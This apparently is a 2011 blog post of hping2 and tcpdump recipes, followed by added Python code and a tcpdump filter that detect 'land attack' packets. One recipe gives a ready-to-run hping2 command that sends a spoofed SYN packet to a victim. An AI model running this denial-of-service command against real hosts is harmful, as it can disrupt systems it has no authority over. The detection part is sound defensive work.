Thursday, July 7, 2011

hping2 and tcpdump

Common use cases:

1) Configuring tcpdump to display all packets exchanged between your machine's IP address and the target machine's IP address, in either direction

# tcpdump -nn host <my_machine_ip> and host <target_machine_ip>

2) Pinging with a chosen payload

$ hping2 --icmp --data 40 --file <file_with_payload> <dest_addr>

# tcpdump -nnX icmp    # shows only ICMP traffic, in hex and ASCII, without resolving host or port names

3) Launching a "land attack"*

$ hping2 --count 1 --baseport 80 --destport 80 --syn --spoof <victim_addr> <victim_addr>

# tcpdump -nn tcp and host <victim_addr>

* A land attack sends the victim a SYN packet whose source IP address equals its destination IP address and whose source port equals its destination port.
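
The footnote's definition can be turned into a capture-side check. The following is an added example, not part of the original post: it parses a raw IPv4 packet and flags a TCP SYN whose source address and port equal its destination address and port. The function names and the sample packets (documentation addresses from 192.0.2.0/24) are constructed for illustration.

```python
import socket
import struct

SYN = 0x02  # TCP SYN flag bit

def is_land_packet(ip_packet: bytes) -> bool:
    """True if raw IPv4 bytes hold a TCP SYN with src addr/port == dst addr/port."""
    if len(ip_packet) < 20:
        return False
    version = ip_packet[0] >> 4
    ihl = (ip_packet[0] & 0x0F) * 4          # IP header length in bytes
    if version != 4 or ihl < 20 or len(ip_packet) < ihl + 14:
        return False
    if ip_packet[9] != socket.IPPROTO_TCP:
        return False
    # Non-first fragments carry no TCP header, so there is nothing to compare.
    if struct.unpack("!H", ip_packet[6:8])[0] & 0x1FFF:
        return False
    src, dst = ip_packet[12:16], ip_packet[16:20]
    sport, dport = struct.unpack("!HH", ip_packet[ihl:ihl + 4])
    flags = ip_packet[ihl + 13]
    return bool(flags & SYN) and src == dst and sport == dport

def sample_packet(src: str, dst: str, sport: int, dport: int,
                  flags: int = SYN) -> bytes:
    """Constructed test input: 20-byte IPv4 header + 20-byte TCP header
    (checksums left at 0; these bytes are only parsed, never sent)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64,
                     socket.IPPROTO_TCP, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 512, 0, 0)
    return ip + tcp

if __name__ == "__main__":
    samples = {
        "land":      sample_packet("192.0.2.10", "192.0.2.10", 80, 80),
        "normal":    sample_packet("192.0.2.20", "192.0.2.10", 40000, 80),
        "same-addr": sample_packet("192.0.2.10", "192.0.2.10", 40000, 80),
        "no-syn":    sample_packet("192.0.2.10", "192.0.2.10", 80, 80, flags=0x10),
    }
    for name, pkt in samples.items():
        print(f"{name:10s} land={is_land_packet(pkt)}")
```

The same comparison can be expressed as a tcpdump filter: `tcpdump -nn 'ip[12:4] = ip[16:4] and tcp[0:2] = tcp[2:2] and tcp[tcpflags] & tcp-syn != 0'`.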